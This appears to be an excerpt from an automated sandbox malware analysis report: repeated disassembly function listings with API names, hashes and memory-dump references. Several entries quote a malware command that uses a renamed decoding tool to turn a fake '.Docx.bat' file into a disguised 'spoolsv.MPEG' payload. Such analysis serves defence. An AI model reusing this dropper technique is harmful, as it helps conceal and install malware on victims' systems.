                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 $EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                                          • API String ID: 0-1899266523
                                                                                                          • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                          • Instruction ID: b64bd52a78cd404e0ba2859732af14aeaa9009bac675468b1eac89fd778c7f9a
                                                                                                          • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                          • Instruction Fuzzy Hash: 45517120A0E64381FB9A7F2DF4402B8B690AF4574CFD68135C65E462B4EF3CA44C87B0
                                                                                                          Function 00007FF7AB12FC30 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 311memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                                                          • String ID: 0123456789$C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
                                                                                                          • API String ID: 1606811317-3850188605
                                                                                                          • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                          • Instruction ID: 0b012d0c77d824589ceca6df754b02bcd46a2b1501e2e1f0570f6ddfc5952729
                                                                                                          • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                          • Instruction Fuzzy Hash: 59D1BF21A0AA4682EB56AB1CF8142B9A7A0FF45B9CFC64231DE5D437B4DF3CE415C760
                                                                                                          Function 00007FF7AB12D840 Relevance: 18.4, APIs: 12, Instructions: 444memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7AB12FE2A), ref: 00007FF7AB12D884
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7AB12FE2A), ref: 00007FF7AB12D89D
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7AB12FE2A), ref: 00007FF7AB12D94D
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7AB12FE2A), ref: 00007FF7AB12D964
                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF7AB12DB89
                                                                                                          • wcstol.MSVCRT ref: 00007FF7AB12DBDF
                                                                                                          • wcstol.MSVCRT ref: 00007FF7AB12DC63
                                                                                                          • memmove.MSVCRT ref: 00007FF7AB12DD33
                                                                                                          • memmove.MSVCRT ref: 00007FF7AB12DE9A
                                                                                                          • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7AB12FE2A), ref: 00007FF7AB12DF1F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 1051989028-0
                                                                                                          • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                          • Instruction ID: 8ba498fae1b2371dcddc441a8f9e9a99b3acfe04663ae6fb0efa6d630bfb9925
                                                                                                          • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                          • Instruction Fuzzy Hash: EC028136A0AB45C2EA26AF18F440279B6A1FB45B98F964635DA8D037F4DF3CD461C720
                                                                                                          Function 00007FF7AB128B20 Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                                          • String ID:
                                                                                                          • API String ID: 1944892715-0
                                                                                                          • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                          • Instruction ID: 3ebd3804370bf2151da4c82f5d8c43610e0c120a3cb38b8f0279a25fa2781187
                                                                                                          • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                          • Instruction Fuzzy Hash: 6EB18661A0B646C6EA66BF19F490179EAA0FF45B88FC64535CA4E473F1EF3DE4448320
                                                                                                          Function 00007FF7AB125458 Relevance: 16.7, APIs: 11, Instructions: 213fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB133578: _get_osfhandle.MSVCRT ref: 00007FF7AB133584
                                                                                                            • Part of subcall function 00007FF7AB133578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB13359C
                                                                                                            • Part of subcall function 00007FF7AB133578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335C3
                                                                                                            • Part of subcall function 00007FF7AB133578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335D9
                                                                                                            • Part of subcall function 00007FF7AB133578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335ED
                                                                                                            • Part of subcall function 00007FF7AB133578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB133602
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB1254DE
                                                                                                          • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF7AB121F7D), ref: 00007FF7AB12552B
                                                                                                          • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF7AB121F7D), ref: 00007FF7AB12554F
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB14345F
                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7AB121F7D), ref: 00007FF7AB14347E
                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7AB121F7D), ref: 00007FF7AB1434C3
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB1434DB
                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7AB121F7D), ref: 00007FF7AB1434FA
                                                                                                            • Part of subcall function 00007FF7AB1336EC: _get_osfhandle.MSVCRT ref: 00007FF7AB133715
                                                                                                            • Part of subcall function 00007FF7AB1336EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7AB133770
                                                                                                            • Part of subcall function 00007FF7AB1336EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB133791
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 1356649289-0
                                                                                                          • Opcode ID: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                                                                                          • Instruction ID: aef350adcae6c8477f281f823c263277b3dda1989b282d116914e2e0830a25c0
                                                                                                          • Opcode Fuzzy Hash: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                                                                                          • Instruction Fuzzy Hash: 08919172A0A642C7EB16AF19F440179F6A1FB89B88F8A4135DA4E477B4EF3CD440CB10
                                                                                                          Function 00007FF7AB1214E8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                                          • String ID: :$\
                                                                                                          • API String ID: 3961617410-1166558509
                                                                                                          • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                          • Instruction ID: 8d7a2713207fc6a61b3dd56f0b257a47f964dcf6fc4c11d195f6d3e0289f80e5
                                                                                                          • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                          • Instruction Fuzzy Hash: 6B21B722A09642C6E752AB6CF484079FAA1FF4B758FC64675D91F433B0DF3CD4498620
                                                                                                          Function 00007FF7AB150C90 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 282COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                                                                          • String ID: &()[]{}^=;!%'+,`~
                                                                                                          • API String ID: 2516562204-381716982
                                                                                                          • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                                          • Instruction ID: 1e49a89f63fa1b8cda2586f9bf55592d36cd6bfa91fd6d7765f206885af8926b
                                                                                                          • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                                          • Instruction Fuzzy Hash: 83C1C232A0665186E755AF69E8842BEB7A0FB44B98F851235DE4E43BB4DF3CE450C710
                                                                                                          Function 00007FF7AB14A39C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 111libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                                          • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                                          • API String ID: 1580871199-2613899276
                                                                                                          • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                          • Instruction ID: abb4c0f58058baa136579dc5cd7d7a7a37b5dcb5b8bbf0bab6cc67d25481b8a4
                                                                                                          • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                          • Instruction Fuzzy Hash: BE51C871A1AB8282EB119B1DF840179B7A4FB49B88F865235DA9E47774EF3CD441CB10
                                                                                                          Function 00007FF7AB127420 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                                          • String ID: con
                                                                                                          • API String ID: 689241570-4257191772
                                                                                                          • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                                          • Instruction ID: 28d87462e9ad78142a62602ab883f6901ece589c410e3f71709741b59ac2a56f
                                                                                                          • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                                          • Instruction Fuzzy Hash: AB41E532A09645C6E611AF19F484339FAA1F749BA8F964334DA2E033F0DF3DD8498750
                                                                                                          Function 00007FF7AB121F90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$EnvironmentVariable
                                                                                                          • String ID: DIRCMD
                                                                                                          • API String ID: 1405722092-1465291664
                                                                                                          • Opcode ID: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                                                                          • Instruction ID: 35eeaf0305876599eb6f297a2141e1e31a897459cfda71eca59bc01077f4a14a
                                                                                                          • Opcode Fuzzy Hash: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                                                                          • Instruction Fuzzy Hash: 9B816C72A05BC1CAEB21DF28E8802EDB7A4FB49748F914139DA8D57B78DF38D1458710
                                                                                                          Function 00007FF7AB14D878 Relevance: 12.1, APIs: 8, Instructions: 89fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 3192234081-0
                                                                                                          • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                          • Instruction ID: e42002e07e2c976ac2adc2f8436ff871d0dd7acc5bd2466ef677c6df6784d418
                                                                                                          • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                          • Instruction Fuzzy Hash: 9E31A031609642CBEB11AF29F44467DFBA1FB89B98F869634DE4A437B5DE3CD4018B10
                                                                                                          Function 00007FF7AB12DF60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 , xrefs: 00007FF7AB12E00B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$FreeProcess_setjmp
                                                                                                          • String ID: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
                                                                                                          • API String ID: 777023205-2363904224
                                                                                                          • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                          • Instruction ID: 20e25a36aa0330a817a098103257f9ce846bef6cd475565b34434753ee6cfc54
                                                                                                          • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                          • Instruction Fuzzy Hash: 4A516731A0FA46C6EB16AF1DF890578F6A4FF48B5CFD64536D90E422B4EF3CA4418621
                                                                                                          Function 00007FF7AB148C18 Relevance: 9.1, APIs: 6, Instructions: 145COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
